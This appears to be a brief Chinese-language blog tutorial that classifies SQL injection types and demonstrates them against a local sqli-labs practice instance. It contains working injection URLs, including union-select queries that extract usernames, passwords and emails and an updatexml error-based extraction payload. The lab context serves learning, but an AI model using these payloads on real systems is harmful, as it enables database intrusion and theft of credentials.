Sql injection summary
in PENETRATION with 0 comment

Sql injection summary

in PENETRATION with 0 comment

sql注入的分类:

【*】有回显

      【1】字符型
                 (1)union联合查询
                 (2)报错注入
      【2】数字型
                 (1)union联合查询
                 (2)报错注入

【*】没回显 (盲注)

      【1】基于布尔盲注
      【2】基于时间

【*】二次注入
【*】其他

       【1】cookies注入
       【2】http头注入
                 (1)user-agent
                 (2)referer

【*】字符编码造成的注入(宽字节注入)

       【1】%df

字符型注入 和 数字型注入

  字符型:    http://127.0.0.1/sqli-labs-master/Less-1/index.php?id=1'  报错类型

Image.png

 
 
 数字型:      http://127.0.0.1/sqli-labs-master/Less-2/index.php?id=1'

Image.png

可以看到报错的参数不同

http://127.0.0.1/sqli-labs-master/Less-1/index.php?id=1' and '1'='1   字符型

Image.png

http://127.0.0.1/sqli-labs-master/Less-2/index.php?id=1' and '1'='1 数字型 报错

Image.png

union 联合查询

http://127.0.0.1/sqli-labs-master/Less-1/index.php?id=2' and 1=2 union select null,username,password from users limit 2,1--+

Image.png

数字型的去掉引号即可:

concat和group_concat() 
concat():连接一个或者多个字符串
group_concat():连接一个组的所有字符串,并以逗号分隔每一条数据
使用group_concat()爆出所有的邮箱

http://127.0.0.1/sqli-labs-master/Less-1/index.php?id=2' and 1=2 union select 
null,group_concat(email_id),null from emails--+

Image.png

concat()查询一条邮箱的记录

http://127.0.0.1/sqli-labs-master/Less-2/index.php?id=1 and 1=2 union select null,concat(0x5b2d5d,
(select email_id from emails limit 2,1)),null--+

Image.png

利用报错 updatexml()函数报错

http://127.0.0.1/sqli-labs-master/Less-1/index.php?id=1' and updatexml(1,concat(0x7e,(SELECT (select
email_id from emails limit 1,1)),0x7e),1) --+

Image.png

【利用union联合查询爆库爆表】

1,先看看如何查询

查数据库
Image.png

查表

Image.png

查字段:
Image.png

[在注入中查询]
Image.png
其余同理

Responses